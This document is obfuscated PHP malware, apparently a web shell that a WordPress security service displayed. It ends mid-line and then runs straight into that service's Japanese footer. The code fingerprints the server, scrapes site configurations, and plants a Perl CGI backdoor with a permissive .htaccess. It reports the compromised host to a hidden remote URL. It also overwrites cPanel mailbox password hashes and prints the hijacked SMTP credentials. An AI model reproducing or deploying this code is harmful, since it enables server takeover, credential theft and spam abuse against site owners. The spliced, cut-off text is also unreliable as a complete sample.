echo $GLOBALS[ð][0x5a] . $XG7BU . $GLOBALS[ð][0x5b];
echo $GLOBALS[ð][0x5e] . $x3Uog . $GLOBALS[ð][0x5f];
echo $GLOBALS[ð][0x6f] . $ACEox . $GLOBALS[ð][0x70];
echo $GLOBALS[ð][0x64] . $GYhUj[0] . $GLOBALS[ð][0x65];
echo $GLOBALS[ð][0x5c] . $GYhUj[0x1] . $GLOBALS[ð][0x5d];
echo $GLOBALS[ð][0x62] . ydVh6(0) . $GLOBALS[ð][0x63];
if (preg_match($GLOBALS[ð][0x6a], $x3Uog)) {
echo "<server><font color=\"red\"><center>[-] Windows</center> </font><br></server>";
} else {
echo "<server><font color=\"green\"><center>[+] Linux</center> </font><br></server>";
}
if (is_dir("/home{$GEgR8}{$WnpSY}/.cpanel")) {
echo "<cp><font color=\"green\"><center>[+] cPanel</center> </font><br></cp>";
} elseif (preg_match($GLOBALS[ð][0x67], $ACEox)) {
echo "<cp><font color=\"green\"><center>[+] vHosts</center> </font><br></cp>";
} else {
echo "<cp><font color=\"red\"><center>[-] There is no cPanel or vHosts.</center> </font><br></cp>";
}
}
function emGki($QmcTU)
{
$mH9bZ = array($GLOBALS[ð][0x19c] => $GLOBALS[ð][0x47], $GLOBALS[ð][0x19d] => $GLOBALS[ð][0x19e], $GLOBALS[ð][0x19f] => $GLOBALS[ð][0x1a0], $GLOBALS[ð][0x1a1] => $GLOBALS[ð][0x1a2], $GLOBALS[ð][0x1a3] => $GLOBALS[ð][0x1a4], $GLOBALS[ð][0x1a5] => $GLOBALS[ð][0x1a6], $GLOBALS[ð][0x1a7] => $GLOBALS[ð][0x1a8], $GLOBALS[ð][0x1a9] => $GLOBALS[ð][0x1aa], $GLOBALS[ð][0x1ab] => $GLOBALS[ð][0x1ac], $GLOBALS[ð][0x1ad] => $GLOBALS[ð][0x1ae], $GLOBALS[ð][0x1a0] => $GLOBALS[ð][0x1a3], $GLOBALS[ð][0x1aa] => $GLOBALS[ð][0x19d], $GLOBALS[ð][0x1af] => $GLOBALS[ð][0x1a1], $GLOBALS[ð][0x1a6] => $GLOBALS[ð][0x1b0], $GLOBALS[ð][0x1b1] => $GLOBALS[ð][0x1b2], $GLOBALS[ð][0x1b3] => $GLOBALS[ð][0x1b4], $GLOBALS[ð][0x1ac] => $GLOBALS[ð][0x1b5]);
$D6mgj = str_split($QmcTU);
$e50EE = $GLOBALS[ð][0x2];
foreach ($D6mgj as $wOVBe) {
if (in_array($wOVBe, $mH9bZ)) {
$e50EE .= $mH9bZ[$wOVBe];
} else {
$e50EE .= $wOVBe;
}
}
return $e50EE;
}
function bWQLE()
{
$qdMec = 0;
$ogEo3 = 0;
$ubZRU = 0;
$yp2PP = 0;
$BU0zm = 0;
$lQymy = 0;
$LOmS0 = trim($_POST[$GLOBALS[ð][0x191]]);
$Enic4 = fW1ye($LOmS0);
if (preg_match($GLOBALS[ð][0x106], $Enic4)) {
preg_match_all($GLOBALS[ð][0x107], $Enic4, $WHqbk);
foreach ($WHqbk[0x1] as $Teaxm) {
$ubZRU++;
}
if ($ubZRU > 0x190) {
die($GLOBALS[ð][0x108]);
}
}
preg_match_all($GLOBALS[ð][0x10c], $Enic4, $rPfM6);
if (preg_match($GLOBALS[ð][0x109], $LOmS0)) {
$zDvDR = str_replace($GLOBALS[ð][0x10a], $GLOBALS[ð][0x2], $LOmS0);
} else {
$zDvDR = str_replace($GLOBALS[ð][0x10b], $GLOBALS[ð][0x2], $LOmS0);
}
$zDvDR = substr($zDvDR, 0, strpos($zDvDR, $GLOBALS[ð][0x105]));
foreach ($rPfM6[0x1] as $Rd6Xn) {
$qdMec++;
if (preg_match($GLOBALS[ð][0x133], $Rd6Xn) || preg_match($GLOBALS[ð][0x134], $Rd6Xn)) {
$kX5Kz = $Rd6Xn . $GLOBALS[ð][0x135];
} elseif (preg_match($GLOBALS[ð][0x136], $Rd6Xn)) {
$kX5Kz = $GLOBALS[ð][0x137] . $zDvDR . $Rd6Xn . $GLOBALS[ð][0x138];
} else {
$kX5Kz = $LOmS0 . $Rd6Xn . $GLOBALS[ð][0x139];
}
$srSx9 = htmlspecialchars_decode(Fw1Ye($kX5Kz));
preg_match($GLOBALS[ð][0x13d], $srSx9, $QObCn);
preg_match($GLOBALS[ð][0x118], $srSx9, $jPaTv);
preg_match($GLOBALS[ð][0x17c], $srSx9, $gBiec);
preg_match($GLOBALS[ð][0x116], $srSx9, $pWfU0);
preg_match($GLOBALS[ð][0x17e], $srSx9, $eBwm4);
preg_match($GLOBALS[ð][0x120], $srSx9, $W_7qP);
preg_match($GLOBALS[ð][0x115], $srSx9, $UYuN4);
preg_match($GLOBALS[ð][0x142], $srSx9, $uXJkb);
preg_match($GLOBALS[ð][0x12c], $srSx9, $VknFC);
preg_match($GLOBALS[ð][0x13a], $srSx9, $zERE7);
preg_match($GLOBALS[ð][0x130], $srSx9, $YhDxn);
preg_match($GLOBALS[ð][0x12a], $srSx9, $rhB3r);
preg_match_all($GLOBALS[ð][0x146], $srSx9, $NK16o);
preg_match_all($GLOBALS[ð][0x110], $srSx9, $G2S_i);
preg_match_all($GLOBALS[ð][0x113], $srSx9, $QO5g8);
preg_match($GLOBALS[ð][0x144], $srSx9, $Jc7_H);
preg_match($GLOBALS[ð][0x112], $srSx9, $fFreY);
preg_match($GLOBALS[ð][0x132], $srSx9, $KK1cF);
preg_match_all($GLOBALS[ð][0x17f], $srSx9, $vV_wN);
preg_match($GLOBALS[ð][0x180], $srSx9, $VVbsx);
preg_match($GLOBALS[ð][0x12b], $srSx9, $O0_Gw);
preg_match($GLOBALS[ð][0x17d], $srSx9, $H3Dnq);
preg_match($GLOBALS[ð][0x13e], $srSx9, $qRVjf);
preg_match($GLOBALS[ð][0x111], $srSx9, $I1XA9);
preg_match($GLOBALS[ð][0x13c], $srSx9, $EQ0fI);
preg_match($GLOBALS[ð][0x13b], $srSx9, $owSpB);
preg_match($GLOBALS[ð][0x114], $srSx9, $pmwNx);
preg_match($GLOBALS[ð][0x143], $srSx9, $ow9vj);
preg_match($GLOBALS[ð][0x12f], $srSx9, $l5zPA);
preg_match($GLOBALS[ð][0x145], $srSx9, $KTQVw);
preg_match($GLOBALS[ð][0x177], $srSx9, $oDKH4);
preg_match($GLOBALS[ð][0x117], $srSx9, $eZeM_);
preg_match($GLOBALS[ð][0x119], $srSx9, $MQNcp);
preg_match($GLOBALS[ð][0x12d], $srSx9, $lMLuB);
preg_match($GLOBALS[ð][0x190], $srSx9, $TqGXu);
preg_match($GLOBALS[ð][0x131], $srSx9, $tB0uO);
if (!empty($lMLuB[0x1]) && !preg_match($GLOBALS[ð][0x12e], $srSx9)) {
$lQymy++;
} elseif (!empty($TqGXu[0x1])) {
$yp2PP++;
} elseif (!empty($tB0uO[0x1])) {
$BU0zm++;
}
if (!empty($QObCn[0x1])) {
echo $GLOBALS[ð][0x147] . $QObCn[0x1] . $GLOBALS[ð][0x148];
$ogEo3++;
} elseif (!empty($jPaTv[0x1])) {
echo $GLOBALS[ð][0x149] . $jPaTv[0x1] . $GLOBALS[ð][0x14a];
$ogEo3++;
} elseif (!empty($owSpB[0x1])) {
echo $GLOBALS[ð][0x14b] . $owSpB[0x1] . $GLOBALS[ð][0x14c];
$ogEo3++;
} elseif (!empty($gBiec[0x1])) {
echo $GLOBALS[ð][0x14d] . $gBiec[0x1] . $GLOBALS[ð][0x14e];
$ogEo3++;
} elseif (!empty($pWfU0[0x1])) {
echo $GLOBALS[ð][0x14f] . $pWfU0[0x1] . $GLOBALS[ð][0x150];
$ogEo3++;
} elseif (!empty($eBwm4[0x1])) {
echo $GLOBALS[ð][0x151] . $eBwm4[0x1] . $GLOBALS[ð][0x152];
$ogEo3++;
} elseif (!empty($W_7qP[0x1])) {
echo $GLOBALS[ð][0x153] . $W_7qP[0x1] . $GLOBALS[ð][0x154];
$ogEo3++;
} elseif (!empty($UYuN4[0x1])) {
echo $GLOBALS[ð][0x155] . $UYuN4[0x1] . $GLOBALS[ð][0x156];
$ogEo3++;
} elseif (!empty($m85ZG[0x1])) {
echo $GLOBALS[ð][0x157] . $m85ZG[0x1] . $GLOBALS[ð][0x158];
$ogEo3++;
} elseif (!empty($uXJkb[0x1])) {
echo $GLOBALS[ð][0x159] . $uXJkb[0x1] . $GLOBALS[ð][0x15a];
$ogEo3++;
} elseif (!empty($VknFC[0x1])) {
echo $GLOBALS[ð][0x15b] . $VknFC[0x1] . $GLOBALS[ð][0x15c];
$ogEo3++;
} elseif (!empty($zERE7[0x1])) {
echo $GLOBALS[ð][0x15d] . $zERE7[0x1] . $GLOBALS[ð][0x15e];
$ogEo3++;
} elseif (!empty($NK16o[0x1])) {
foreach ($NK16o[0x1] as $Ez2Fk) {
if (!($Ez2Fk == $GLOBALS[ð][0x15f])) {
echo $GLOBALS[ð][0x160] . $Ez2Fk . $GLOBALS[ð][0x161];
$ogEo3++;
}
}
} elseif (!empty($QO5g8[0x1])) {
foreach ($QO5g8[0x1] as $Ez2Fk) {
if (!($Ez2Fk == $GLOBALS[ð][0x162])) {
echo $GLOBALS[ð][0x163] . $Ez2Fk . $GLOBALS[ð][0x164];
$ogEo3++;
}
}
} elseif (!empty($Jc7_H[0x1])) {
echo $GLOBALS[ð][0x165] . $Jc7_H[0x1] . $GLOBALS[ð][0x166];
$ogEo3++;
} elseif (!empty($fFreY[0x1])) {
echo $GLOBALS[ð][0x167] . $fFreY[0x1] . $GLOBALS[ð][0x168];
$ogEo3++;
} elseif (!empty($KK1cF[0x1])) {
echo $GLOBALS[ð][0x169] . $KK1cF[0x1] . $GLOBALS[ð][0x16a];
$ogEo3++;
} elseif (!empty($VVbsx[0x1])) {
echo $GLOBALS[ð][0x16b] . $VVbsx[0x1] . $GLOBALS[ð][0x16c];
$ogEo3++;
} elseif (!empty($O0_Gw[0x1])) {
echo $GLOBALS[ð][0x16d] . $O0_Gw[0x1] . $GLOBALS[ð][0x16e];
$ogEo3++;
} elseif (!empty($vV_wN[0x1])) {
echo $GLOBALS[ð][0x16f] . $vV_wN[0x1][0x1] . $GLOBALS[ð][0x170];
$ogEo3++;
} elseif (!empty($O0_Gw[0x1])) {
echo $GLOBALS[ð][0x171] . $O0_Gw[0x1] . $GLOBALS[ð][0x172];
$ogEo3++;
} elseif (!empty($O0_Gw[0x1])) {
echo $GLOBALS[ð][0x173] . $O0_Gw[0x1] . $GLOBALS[ð][0x174];
$ogEo3++;
} elseif (!empty($pmwNx[0x1])) {
echo $GLOBALS[ð][0x175] . $pmwNx[0x1] . $GLOBALS[ð][0x176];
$ogEo3++;
}
if (!empty($G2S_i[0x1])) {
$Mo0Fh = $G2S_i[0x1][0x1];
preg_match_all($GLOBALS[ð][0x181], $Mo0Fh, $yz0ZU);
$yz0ZU = $yz0ZU[0x1][0];
echo $GLOBALS[ð][0x182] . $yz0ZU . $GLOBALS[ð][0x183];
$ogEo3++;
}
if (!empty($I1XA9[0x1])) {
echo $GLOBALS[ð][0x178] . $I1XA9[0x1] . $GLOBALS[ð][0x179];
$ogEo3++;
}
if (!empty($EQ0fI[0x1])) {
echo $GLOBALS[ð][0x17a] . $EQ0fI[0x1] . $GLOBALS[ð][0x17b];
$ogEo3++;
}
if (preg_match($GLOBALS[ð][0x11a], $Rd6Xn) || preg_match($GLOBALS[ð][0x11b], $srSx9)) {
if (!empty($H3Dnq[0x1])) {
echo $GLOBALS[ð][0x11c] . $H3Dnq[0x1] . $GLOBALS[ð][0x11d];
$ogEo3++;
} elseif (!empty($qRVjf[0x1])) {
echo $GLOBALS[ð][0x11e] . $qRVjf[0x1] . $GLOBALS[ð][0x11f];
$ogEo3++;
}
}
if (!empty($oDKH4[0x1]) && !preg_match($GLOBALS[ð][0x18a], $oDKH4[0x1])) {
echo $GLOBALS[ð][0x18b] . $oDKH4[0x1] . $GLOBALS[ð][0x18c];
$ogEo3++;
} elseif (!empty($ow9vj[0x1]) && !preg_match($GLOBALS[ð][0x18d], $ow9vj[0x1])) {
echo $GLOBALS[ð][0x18e] . $ow9vj[0x1] . $GLOBALS[ð][0x18f];
$ogEo3++;
}
if (!empty($eZeM_[0x1]) && !preg_match($GLOBALS[ð][0x124], $eZeM_[0x1])) {
echo $GLOBALS[ð][0x125] . $eZeM_[0x1] . $GLOBALS[ð][0x126];
$ogEo3++;
} elseif (!empty($l5zPA[0x1]) && !preg_match($GLOBALS[ð][0x127], $l5zPA[0x1])) {
echo $GLOBALS[ð][0x128] . $l5zPA[0x1] . $GLOBALS[ð][0x129];
$ogEo3++;
}
if (!empty($MQNcp[0x1]) && !preg_match($GLOBALS[ð][0x184], $MQNcp[0x1])) {
echo $GLOBALS[ð][0x185] . $MQNcp[0x1] . $GLOBALS[ð][0x186];
$ogEo3++;
} elseif (!empty($KTQVw[0x1]) && !preg_match($GLOBALS[ð][0x187], $KTQVw[0x1])) {
echo $GLOBALS[ð][0x188] . $KTQVw[0x1] . $GLOBALS[ð][0x189];
$ogEo3++;
}
if (!empty($pWfU0[0x1]) && preg_match($GLOBALS[ð][0x121], $srSx9)) {
echo $GLOBALS[ð][0x122] . $kX5Kz . $GLOBALS[ð][0x123];
}
if (!empty($eBwm4[0x1]) && preg_match($GLOBALS[ð][0x13f], $srSx9)) {
echo $GLOBALS[ð][0x140] . $kX5Kz . $GLOBALS[ð][0x141];
}
}
$qdMec -= 0xa;
if ($qdMec >= 0x2) {
$qdMec /= 0x2;
}
if ($qdMec > $ogEo3 && trim($_POST[$GLOBALS[ð][0x10d]]) != $GLOBALS[ð][0x10e]) {
echo "\n<error>404</error>";
}
if ($yp2PP > 0) {
echo "\n<br><wordpress>{$yp2PP}</wordpress><br>\n";
}
if ($BU0zm > 0) {
echo "\n<br><joomla>{$BU0zm}</joomla><br>\n";
}
if ($lQymy > 0) {
echo "\n<br><opencart>{$lQymy}</opencart><br>\n";
}
}
function FvBEN($T4JMK, $f_2D8)
{
mkdir($GLOBALS[ð][0x196]);
$Mb5nI = $GLOBALS[ð][0x197];
global $W6Z5Y;
$oxjzQ = explode($GLOBALS[ð][0x85], $_SERVER[$GLOBALS[ð][0x195]]);
$Bl19g = $W6Z5Y . $_SERVER[$GLOBALS[ð][0x192]] . str_replace(end($oxjzQ), "root/{$f_2D8}", $_SERVER[$GLOBALS[ð][0x193]]);
if (!file_exists("root/{$f_2D8}")) {
sU59q("root/{$f_2D8}", $T4JMK);
Su59q($GLOBALS[ð][0x194], "Options All\n\nAddType application/x-httpd-cgi .pl\n\nAddHandler cgi-script .pl\nAddHandler cgi-script .pl");
chmod("root/{$f_2D8}", 0755);
}
return $Bl19g;
}
function BM1lJ()
{
global $XG7BU;
$ghUMy = UFeQC($GLOBALS[ð][0x1ec]);
if (!$ghUMy) {
$urRH1 = fW1yE($GLOBALS[ð][0x1ea]);
if (!preg_match($GLOBALS[ð][0x1e8], $urRH1)) {
$urRH1 = fW1YE($GLOBALS[ð][0x1e9]);
}
$zBOmi = FvBeN($urRH1, $GLOBALS[ð][0x1eb]);
$ghUMy = fW1ye($zBOmi);
}
if (preg_match($GLOBALS[ð][0x1ed], $ghUMy)) {
echo "<root><ip>{$XG7BU}</ip><port><br>22</port><user><br>root</user><password><br>0</password></root>\n";
} else {
echo "Error3-Root";
}
}
function IjJzN($kX5Kz, $sD1Ai)
{
if (preg_match($GLOBALS[ð][0x54], $sD1Ai)) {
preg_match($GLOBALS[ð][0x58], $sD1Ai, $tr1Sr);
$tr1Sr = $tr1Sr[0x1];
$gNjTh = SMVyq($kX5Kz . $GLOBALS[ð][0x55] . $tr1Sr);
$sD1Ai = SMvyQ($kX5Kz);
$a3FtC = $GLOBALS[ð][0x57];
$Q5WED = strpos($sD1Ai, $a3FtC) + strlen($a3FtC);
$sD1Ai = $GLOBALS[ð][0x59] . substr($sD1Ai, $Q5WED);
unlink($GLOBALS[ð][0x56]);
}
return $sD1Ai;
}
function woB4r()
{
$XEv3Q = $GLOBALS[ð][0x252];
global $kw7Hz;
$MMvEZ = "vowe" . strtolower($XEv3Q[0x0]) . strtolower($XEv3Q[0x33]) . $GLOBALS[ð][0x1af] . strtolower($XEv3Q[0x1]) . $XEv3Q[0x12] . $XEv3Q[0x79] . $XEv3Q[0x7] . strtolower($XEv3Q[0x59]) . strtolower($XEv3Q[0x1]) . $XEv3Q[0x10];
if (function_exists($GLOBALS[ð][0x24c])) {
$r2z84 = curl_init();
curl_setopt($r2z84, CURLOPT_RETURNTRANSFER, !0);
curl_setopt($r2z84, CURLOPT_URL, EMGKI($GLOBALS[ð][0x24d]) . $GLOBALS[ð][0x105] . $GLOBALS[ð][0x85] . emgKi($MMvEZ) . $GLOBALS[ð][0x85] . eMgKi($GLOBALS[ð][0x24e]) . $GLOBALS[ð][0x105] . EmgKI($GLOBALS[ð][0x24f]) . $GLOBALS[ð][0x250]);
curl_setopt($r2z84, CURLOPT_TIMEOUT, 0x9);
curl_setopt($r2z84, CURLOPT_CONNECTTIMEOUT, 0x9);
curl_setopt($r2z84, CURLOPT_USERAGENT, $GLOBALS[ð][0x251]);
curl_setopt($r2z84, CURLOPT_REFERER, $_SERVER[$GLOBALS[ð][0x1de]] . $kw7Hz);
if (curl_exec($r2z84) != $GLOBALS[ð][0x2]) {
curl_close($r2z84);
return;
}
curl_close($r2z84);
}
if (function_exists($GLOBALS[ð][0x253]) && function_exists($GLOBALS[ð][0x254])) {
$r2z84 = array($GLOBALS[ð][0x227] => array($GLOBALS[ð][0x255] => $GLOBALS[ð][0x238], $GLOBALS[ð][0x256] => $GLOBALS[ð][0x257] . $_SERVER[$GLOBALS[ð][0x258]] . $kw7Hz . $GLOBALS[ð][0x259] . $GLOBALS[ð][0x25a]));
file_get_contents(eMGKi($GLOBALS[ð][0x25b]) . $GLOBALS[ð][0x105] . $GLOBALS[ð][0x105] . emgKI($MMvEZ) . $GLOBALS[ð][0x85] . Emgki($GLOBALS[ð][0x25c]) . $GLOBALS[ð][0x85] . EMgKI($GLOBALS[ð][0x25d]) . $GLOBALS[ð][0x25e], !1, stream_context_create($r2z84));
}
return;
}
$YAaFV = strval(basename("/var/www/html/bkv8.txt"));
$H2CpY = explode($GLOBALS[ð][0x53], $YAaFV);
$YAaFV = $H2CpY[0] . $GLOBALS[ð][0x1ba];
$Wu7is = ufeqC($YAaFV);
if (trim($_SERVER[$GLOBALS[ð][0x1dd]]) == $GLOBALS[ð][0x2] || $_SERVER[$GLOBALS[ð][0x1de]] == $GLOBALS[ð][0x1df] || $_SERVER[$GLOBALS[ð][0x1e0]] == $GLOBALS[ð][0x1e1] || !preg_match($GLOBALS[ð][0x1e2], strval($_SERVER[$GLOBALS[ð][0x1e3]]))) {
SU59q($YAaFV, Emgki(str_rot13(emGKI($Wu7is))));
}
function VZQId()
{
function X4gL0($O2ar5, $t0DY2)
{
$wmx5s = curl_init();
curl_setopt($wmx5s, CURLOPT_URL, $O2ar5);
curl_setopt($wmx5s, CURLOPT_HEADER, !0);
curl_setopt($wmx5s, CURLOPT_RETURNTRANSFER, 0x1);
curl_setopt($wmx5s, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($wmx5s, CURLOPT_CONNECTTIMEOUT, $t0DY2);
curl_setopt($wmx5s, CURLOPT_TIMEOUT, $t0DY2);
curl_setopt($wmx5s, CURLOPT_FOLLOWLOCATION, 0x1);
curl_setopt($wmx5s, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($wmx5s, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($wmx5s, CURLOPT_USERAGENT, $_SERVER[$GLOBALS[ð][0xf9]]);
$xM2hz = curl_exec($wmx5s);
curl_close($wmx5s);
return $xM2hz;
}
function NrmHZ($x3Uog, $qCpsN)
{
if (preg_match($GLOBALS[ð][0xe5], $x3Uog)) {
if ($qCpsN) {
$gqcAE = A7gCN($GLOBALS[ð][0xe9]);
if (!$gqcAE) {
$gqcAE = FW1YE($GLOBALS[ð][0xe7]);
sU59q($GLOBALS[ð][0xe8], $gqcAE);
}
a7Gcn($GLOBALS[ð][0xea]);
a7gcn($GLOBALS[ð][0xe6]);
} else {
$jEIS7 = FW1Ye($GLOBALS[ð][0xed]);
if (!preg_match($GLOBALS[ð][0xeb], $jEIS7)) {
$jEIS7 = fW1Ye($GLOBALS[ð][0xec]);
}
$kX5Kz = fVbeN($jEIS7, $GLOBALS[ð][0xee]);
X4gl0($kX5Kz, 0x1e);
}
} else {
if ($qCpsN) {
$gqcAE = a7GcN($GLOBALS[ð][0xef]);
if (!$gqcAE) {
$gqcAE = fW1yE($GLOBALS[ð][0xf2]);
su59q($GLOBALS[ð][0xf3], $gqcAE);
}
a7gcN($GLOBALS[ð][0xf1]);
A7gCn($GLOBALS[ð][0xf0]);
} else {
$VparV = fw1Ye($GLOBALS[ð][0xf4]);
if (!preg_match($GLOBALS[ð][0xf6], $VparV)) {
$VparV = fW1YE($GLOBALS[ð][0xf7]);
}
$kX5Kz = FvbeN($VparV, $GLOBALS[ð][0xf5]);
x4Gl0($kX5Kz, 0x1e);
}
}
echo $GLOBALS[ð][0xf8];
}
$qCpsN = a7gcN($GLOBALS[ð][0xd8]);
global $x3Uog;
if (preg_match($GLOBALS[ð][0xd9], $x3Uog) || preg_match($GLOBALS[ð][0xda], $x3Uog) || preg_match($GLOBALS[ð][0xdb], $x3Uog) || preg_match($GLOBALS[ð][0xdc], $x3Uog) || preg_match($GLOBALS[ð][0xdd], $x3Uog) || preg_match($GLOBALS[ð][0xde], $x3Uog) || preg_match($GLOBALS[ð][0xdf], $x3Uog)) {
NrMhZ($x3Uog, $qCpsN);
} elseif (preg_match($GLOBALS[ð][0xe0], $x3Uog)) {
if (!preg_match($GLOBALS[ð][0xe1], $x3Uog) && !preg_match($GLOBALS[ð][0xe2], $x3Uog)) {
NrMhz($x3Uog, $qCpsN);
} else {
echo $GLOBALS[ð][0xe3];
}
} else {
echo $GLOBALS[ð][0xe4];
}
}
function D6MNI()
{
global $GEgR8;
global $WnpSY;
$z0tRT = glob("/home{$GEgR8}{$WnpSY}" . $GLOBALS[ð][0x76], GLOB_ONLYDIR);
foreach ($z0tRT as $LOmS0) {
$NlktG = explode($GLOBALS[ð][0x85], $LOmS0);
$u_HWU = $NlktG[count($NlktG) - 0x1];
$ghUMy = UfEqC("/home{$GEgR8}{$WnpSY}" . $GLOBALS[ð][0x83] . $u_HWU . $GLOBALS[ð][0x84]);
if (preg_match($GLOBALS[ð][0x81], $ghUMy)) {
die($GLOBALS[ð][0x82]);
}
$LSeh6 = explode($GLOBALS[ð][0x7c], $ghUMy);
unlink("/home{$GEgR8}{$WnpSY}" . $GLOBALS[ð][0x7f] . $u_HWU . $GLOBALS[ð][0x80]);
foreach ($LSeh6 as $Y0TMt) {
$Y0TMt = explode($GLOBALS[ð][0x1], $Y0TMt);
foreach ($Y0TMt as $mQp8f) {
$CzWXh = explode($GLOBALS[ð][0x7e], $mQp8f);
$mH9bZ = $CzWXh[0];
if ($mH9bZ) {
$Ez2Fk = cqXAS();
$ACEox = crypt($Ez2Fk, $GLOBALS[ð][0x7d]);
MiaSl("/home{$GEgR8}{$WnpSY}" . $GLOBALS[ð][0x79] . $u_HWU . $GLOBALS[ð][0x7a], $mH9bZ . $GLOBALS[ð][0x4f] . $ACEox . $GLOBALS[ð][0x7b] . $GLOBALS[ð][0x7c]);
if (!preg_match($GLOBALS[ð][0x77], $mH9bZ) && !preg_match($GLOBALS[ð][0x78], $mH9bZ)) {
echo "<findersmtp>{$u_HWU}|587|{$mH9bZ}!!{$u_H■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.